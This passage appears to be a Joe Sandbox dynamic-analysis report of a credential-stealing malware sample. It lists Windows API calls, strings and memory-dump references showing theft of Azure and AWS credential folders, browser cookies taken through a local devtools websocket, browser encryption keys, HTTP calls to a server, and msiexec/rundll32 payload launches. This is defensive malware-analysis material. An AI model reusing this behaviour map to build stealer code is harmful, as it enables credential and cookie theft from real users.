                                  • lstrlen.KERNEL32(00000000), ref: 0070CF44
                                  • CloseHandle.KERNEL32(00000000), ref: 0070CF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 541afdd493b5bb18d980f6758eb2fdc27e871ae9ae7772c3e0524aa9db6f8ec5
                                  • Instruction ID: e933c00712dd7092ca64ef82ec07b5317fdd124b16acb7f651d419b5d9167e86
                                  • Opcode Fuzzy Hash: 541afdd493b5bb18d980f6758eb2fdc27e871ae9ae7772c3e0524aa9db6f8ec5
                                  • Instruction Fuzzy Hash: 21E11DB1915108FBCB14EBA8DCA6FEEB779AF14310F004199F106631D1EF386A89CB65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,011DB3F0,00000000,00020019,00000000,007205BE), ref: 00718534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007185B6
                                  • wsprintfA.USER32 ref: 007185E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0071860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0071861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718629
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 4ecea5f14eaa14c10269737b034250ac1ccfe457d41fa96143a6dcc598b835c5
                                  • Instruction ID: f2531c8c26ae8277b681cd9e6ebf08b7089e412f3131f16c375859767ea652de
                                  • Opcode Fuzzy Hash: 4ecea5f14eaa14c10269737b034250ac1ccfe457d41fa96143a6dcc598b835c5
                                  • Instruction Fuzzy Hash: DE814CB1955118EBDB24DB98DC95FEAB7B9BF08310F1082D9E109A6180DF746BC4CFA1
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007191FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `dqF$`dqF$image/jpeg
                                  • API String ID: 2244384528-3864370273
                                  • Opcode ID: 3c215083f71e1fde7b7f6538d379ab8b156acf2f5dfc359d7d3e2ec12c02baa2
                                  • Instruction ID: 44c456b5965c241223b6b3c87aae3f3307d9f4202e3051daa6e24d3cb0775cd9
                                  • Opcode Fuzzy Hash: 3c215083f71e1fde7b7f6538d379ab8b156acf2f5dfc359d7d3e2ec12c02baa2
                                  • Instruction Fuzzy Hash: 1C71EB71A55208EBDB14DFE4DC99FEEB7B8BB48300F108509F616A72D0EB34A945DB60
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00715000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0071501D
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714B7C
                                    • Part of subcall function 00714B60: FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 007150A9
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                    • Part of subcall function 00714B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                    • Part of subcall function 00714B60: FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00715118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00715135
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714C00
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,007208D3), ref: 00714C15
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714C32
                                    • Part of subcall function 00714B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00714C6E
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,011DE880), ref: 00714C9A
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,00720FE0), ref: 00714CAC
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,?), ref: 00714CC0
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,00720FE4), ref: 00714CD2
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,?), ref: 00714CE6
                                    • Part of subcall function 00714B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00714CFC
                                    • Part of subcall function 00714B60: DeleteFileA.KERNEL32(?), ref: 00714D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: bd1ec4c86b3c963ac89d5d8226cbaadd5d1a4940e7e5e9e0842328379012c844
                                  • Instruction ID: bee885ff7f8c1e923612dd9b426e7725897af779c174c4089d6bf691b05c64f3
                                  • Opcode Fuzzy Hash: bd1ec4c86b3c963ac89d5d8226cbaadd5d1a4940e7e5e9e0842328379012c844
                                  • Instruction Fuzzy Hash: E84195FAA84218B7DB24E770EC9BFDD73385B64701F404554B249660C1FEB857C88B92
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00713415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007135AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0071373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 112919c5f13517023e0253794c35b227bf9e7d4683d7b652a031f2261f73a0c8
                                  • Instruction ID: 6a38ec9d2aa8752b5106d37efa760fc069b4144799748be639b6e7404516d375
                                  • Opcode Fuzzy Hash: 112919c5f13517023e0253794c35b227bf9e7d4683d7b652a031f2261f73a0c8
                                  • Instruction Fuzzy Hash: 83120FB1915118EACB14FBA4DDA6FEDB739AF14310F004599F106661D2EF382BC9CBA1
                                  APIs
                                    • Part of subcall function 00709A50: InternetOpenA.WININET(00720AF6,00000001,00000000,00000000,00000000), ref: 00709A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00709CAF
                                  • lstrcat.KERNEL32(?,007212C4), ref: 00709CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00709CD5
                                  • lstrcat.KERNEL32(?,007212C8), ref: 00709CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00709CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00709D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00709D17
                                  • lstrlen.KERNEL32(00000000), ref: 00709D26
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: 372945c1e01a556a3869febbb54387f94a09c1941604230fd2fa11c33f0c2a1f
                                  • Instruction ID: 25e307f54615df24b442b787480e26e5a91b9802630200e0bc7423bda9c1f057
                                  • Opcode Fuzzy Hash: 372945c1e01a556a3869febbb54387f94a09c1941604230fd2fa11c33f0c2a1f
                                  • Instruction Fuzzy Hash: C9516FB1950518EBCB14EBE4DC99FEEB378BB54301F404658F205A70D1EB78AA89CF61
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 007062D0: InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                    • Part of subcall function 007062D0: StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                    • Part of subcall function 007062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                    • Part of subcall function 007062D0: HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                    • Part of subcall function 007062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                    • Part of subcall function 007062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715568
                                  • lstrlen.KERNEL32(00000000), ref: 0071557F
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 007155B4
                                  • lstrlen.KERNEL32(00000000), ref: 007155D3
                                  • lstrlen.KERNEL32(00000000), ref: 007155FE
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 46cb48f13878ac088fc4d4c13725c2697c6a4ef63b3466a12d18d7c5e8bc680e
                                  • Instruction ID: 41f6ffb91b515b949e83d9117267d9126a5d14623fd77f84472574e27b04487a
                                  • Opcode Fuzzy Hash: 46cb48f13878ac088fc4d4c13725c2697c6a4ef63b3466a12d18d7c5e8bc680e
                                  • Instruction Fuzzy Hash: 47516170615148EBCB28FF68DDAAAED737AAF50350F504418F406670D1EF386B84CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 32bab5b6695c7a21937ba24b4f06539e4b039af4d8021cc3f4cb6ef4e0eb9531
                                  • Instruction ID: 9ee0ff88310718fc9efefd6efff90f83a6e911142a5654eedf352658014740e9
                                  • Opcode Fuzzy Hash: 32bab5b6695c7a21937ba24b4f06539e4b039af4d8021cc3f4cb6ef4e0eb9531
                                  • Instruction Fuzzy Hash: B1C1B2B5A41109EBCB14EF68EC99FDE7379AF54300F004599F509A72C1EA34AAC5CF91
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071453C
                                  • lstrcat.KERNEL32(?,011DE560), ref: 0071455B
                                  • lstrcat.KERNEL32(?,?), ref: 0071456F
                                  • lstrcat.KERNEL32(?,011DD3B8), ref: 00714583
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F20: GetFileAttributesA.KERNEL32(00000000,?,00701B94,?,?,0072577C,?,?,00720E22), ref: 00718F2F
                                    • Part of subcall function 0070A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0070A489
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00719550: GlobalAlloc.KERNEL32(00000000,0071462D,0071462D), ref: 00719563
                                  • StrStrA.SHLWAPI(?,011DE308), ref: 00714643
                                  • GlobalFree.KERNEL32(?), ref: 00714762
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                    • Part of subcall function 0070A210: LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                    • Part of subcall function 0070A210: LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007146F3
                                  • StrCmpCA.SHLWAPI(?,007208D2), ref: 00714710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00714722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00714735
                                  • lstrcat.KERNEL32(00000000,00720FA0), ref: 00714744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
